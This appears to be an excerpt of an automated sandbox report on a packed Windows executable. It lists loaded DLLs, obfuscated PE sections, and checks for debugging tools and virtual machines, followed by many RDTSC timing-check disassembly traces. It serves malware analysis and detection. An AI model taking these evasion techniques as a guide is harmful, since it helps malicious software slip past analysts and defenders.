              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Section loaded: version.dll
              Source: BJQizQ6sqT.exe Static file information: File size 2916352 > 1048576
              Source: BJQizQ6sqT.exe Static PE information: Raw size of qxtptbyt is bigger than: 0x100000 < 0x2a0000

              Data Obfuscation

              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Unpacked PE file: 0.2.BJQizQ6sqT.exe.a30000.0.unpack :EW;.rsrc :W;.idata :W;qxtptbyt:EW;fodmgcsz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;qxtptbyt:EW;fodmgcsz:EW;.taggant:EW;
              Source: initial sample Static PE information: section where entry point is pointing to: .taggant
              Source: BJQizQ6sqT.exe Static PE information: real checksum: 0x2cf12c should be: 0x2d3cd2
              Source: BJQizQ6sqT.exe Static PE information: section name:
              Source: BJQizQ6sqT.exe Static PE information: section name: .rsrc
              Source: BJQizQ6sqT.exe Static PE information: section name: .idata
              Source: BJQizQ6sqT.exe Static PE information: section name: qxtptbyt
              Source: BJQizQ6sqT.exe Static PE information: section name: fodmgcsz
              Source: BJQizQ6sqT.exe Static PE information: section name: .taggant
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Code function: 0_3_0106C844 pushad ; retf 0_3_0106C845
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Code function: 0_3_01073CC4 push cs; iretd 0_3_01073CD2
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Code function: 0_3_01073CE5 push cs; retf 0006h 0_3_01073CEA
              Source: BJQizQ6sqT.exe Static PE information: section name: entropy: 7.976841630322983

              Boot Survival

              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Window searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Window searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3C27E second address: C3C30A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FC040F643F6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC040F643FFh 0x00000015 pop edx 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FC040F643F8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov ebx, dword ptr [ebp+122D2151h] 0x00000037 push 00000000h 0x00000039 jnl 00007FC040F643F6h 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push edi 0x00000044 call 00007FC040F643F8h 0x00000049 pop edi 0x0000004a mov dword ptr [esp+04h], edi 0x0000004e add dword ptr [esp+04h], 0000001Bh 0x00000056 inc edi 0x00000057 push edi 0x00000058 ret 0x00000059 pop edi 0x0000005a ret 0x0000005b sbb bl, FFFFFFF1h 0x0000005e xor di, B1B4h 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 jmp 00007FC040F643FBh 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3C30A second address: C3C30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3D320 second address: C3D324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3C49A second address: C3C4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3E39D second address: C3E3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3E3A1 second address: C3E3A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3E3A7 second address: C3E3AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C3F22C second address: C3F234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C414E7 second address: C414F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC040F643F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C405D5 second address: C40602 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC0410B9FA8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jg 00007FC0410B9FACh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC0410B9FB1h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C42715 second address: C4271A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4271A second address: C42724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FC0410B9FA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C485C5 second address: C485C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C456B5 second address: C456BE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C485C9 second address: C48662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007FC040F643F6h 0x0000000d jl 00007FC040F643F6h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 js 00007FC040F64402h 0x0000001c je 00007FC040F643FCh 0x00000022 jo 00007FC040F643F6h 0x00000028 nop 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007FC040F643F8h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ebx 0x00000048 call 00007FC040F643F8h 0x0000004d pop ebx 0x0000004e mov dword ptr [esp+04h], ebx 0x00000052 add dword ptr [esp+04h], 0000001Ch 0x0000005a inc ebx 0x0000005b push ebx 0x0000005c ret 0x0000005d pop ebx 0x0000005e ret 0x0000005f mov bh, 46h 0x00000061 push 00000000h 0x00000063 ja 00007FC040F643FCh 0x00000069 sbb bx, F4C6h 0x0000006e push eax 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FC040F64401h 0x00000077 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C456BE second address: C4573B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pop eax 0x0000000d nop 0x0000000e jmp 00007FC0410B9FB8h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov di, ax 0x0000001d mov ebx, 1CBBCA64h 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007FC0410B9FA8h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov bh, 09h 0x00000045 mov eax, dword ptr [ebp+122D13A9h] 0x0000004b mov edi, dword ptr [ebp+122D391Bh] 0x00000051 push FFFFFFFFh 0x00000053 mov dword ptr [ebp+122D34F1h], edx 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jnc 00007FC0410B9FA8h 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4675C second address: C4676D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007FC040F643F6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4676D second address: C467DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 nop 0x00000007 jbe 00007FC0410B9FAEh 0x0000000d jnc 00007FC0410B9FA8h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FC0410B9FA8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D3C32h] 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov bl, dl 0x00000043 mov eax, dword ptr [ebp+122D0635h] 0x00000049 jnp 00007FC0410B9FA7h 0x0000004f mov ebx, 6DD3096Bh 0x00000054 push FFFFFFFFh 0x00000056 xor dword ptr [ebp+12485667h], esi 0x0000005c nop 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 pop eax 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C467DB second address: C467EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC040F643FCh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C48787 second address: C4878B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4878B second address: C4878F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A524 second address: C4A54F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC0410B9FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC0410B9FB9h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A54F second address: C4A5B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 xor bh, FFFFFF93h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FC040F643F8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 add edi, 72EF3360h 0x0000002e mov dword ptr [ebp+1244CE54h], eax 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007FC040F643F8h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 00000019h 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A5B7 second address: C4A5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A5BE second address: C4A5CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC040F643FBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A5CD second address: C4A5D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4978F second address: C49793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C49793 second address: C497AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC0410B9FB8h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A5D1 second address: C4A5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC040F643FAh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A78B second address: C4A795 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC0410B9FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4DCF6 second address: C4DD19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC040F643FFh 0x0000000d jns 00007FC040F643F6h 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C4A795 second address: C4A79A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5442B second address: C5442F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C53B9E second address: C53BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C53D1E second address: C53D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C59652 second address: C59658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C59658 second address: C5966A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC040F643F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5966A second address: C5966E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5966E second address: C59672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C598CA second address: C598D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C598D7 second address: C598FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC040F64407h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C598FA second address: C59900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C59900 second address: C59904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF7171 second address: BF7177 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF7177 second address: BF7181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC040F643F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF7181 second address: BF71A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FC0410B9FA8h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jng 00007FC0410B9FBAh 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d popad 0x0000001e pushad 0x0000001f push edi 0x00000020 pop edi 0x00000021 push eax 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5E8B1 second address: C5E8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5E8B6 second address: C5E8D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5E8D4 second address: C5E8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC040F643F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5EB8C second address: C5EBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC0410B9FB2h 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FC0410B9FB7h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5EBC0 second address: C5EBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FC040F643F6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5EBCD second address: C5EBD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5F011 second address: C5F026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC040F64401h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5F026 second address: C5F03E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC0410B9FADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C5F196 second address: C5F1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC040F64401h 0x00000009 jmp 00007FC040F64405h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF3B54 second address: BF3B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: BF3B58 second address: BF3B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC040F64407h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C687E6 second address: C687F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007FC0410B9FAAh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C687F9 second address: C687FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C687FD second address: C6880B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FC0410B9FA6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D124 second address: C6D12D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D12D second address: C6D143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC0410B9FA6h 0x0000000a jnc 00007FC0410B9FA6h 0x00000010 popad 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\BJQizQ6sqT.exeRDTSC instruction interceptor: First address: C6D143 second address: C6D151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC040F643F6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
